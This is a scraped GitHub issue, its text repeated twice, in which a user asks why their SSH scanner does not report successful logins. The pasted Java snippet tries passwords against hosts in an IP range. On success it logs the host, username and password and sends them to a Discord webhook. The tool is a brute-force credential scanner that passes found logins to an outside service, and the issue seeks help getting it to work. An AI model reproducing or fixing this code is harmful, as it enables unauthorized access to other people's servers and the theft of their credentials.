You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hello,The scanner does not print (verbose) data with a successful server. It does not send to the webhook or verbose.(I load my vps iprange and password.)
Eror can be in:
if (success) {
final int port = Integer.parseInt(p);
try {
final com.jcraft.jsch.Session session = this.jSch.getSession(username, host, port);
session.setPassword(password);
session.setConfig(this.properties);
session.setTimeout(Integer.parseInt(String.valueOf(this.configuration.get("timeout"))));
session.connect();
if (!(username + ":" + password).equals(this.falsePositive)) {
Logger.log(String.format("[%d] %s@%s:%d (password: %s) | Connected", Thread.currentThread().getId(), username, host, port, password));
if (!this.configuration.get("webhook").equals(""))
new DiscordWebhook((String) this.configuration.get("webhook")).sendWebhook(host, username, password, port);
}
The text was updated successfully, but these errors were encountered:
Hello,The scanner does not print (verbose) data with a successful server. It does not send to the webhook or verbose.(I load my vps iprange and password.)
Eror can be in:
if (success) {
final int port = Integer.parseInt(p);
try {
final com.jcraft.jsch.Session session = this.jSch.getSession(username, host, port);
session.setPassword(password);
session.setConfig(this.properties);
session.setTimeout(Integer.parseInt(String.valueOf(this.configuration.get("timeout"))));
session.connect();
if (!(username + ":" + password).equals(this.falsePositive)) {
Logger.log(String.format("[%d] %s@%s:%d (password: %s) | Connected", Thread.currentThread().getId(), username, host, port, password));
if (!this.configuration.get("webhook").equals(""))
new DiscordWebhook((String) this.configuration.get("webhook")).sendWebhook(host, username, password, port);
}
The text was updated successfully, but these errors were encountered: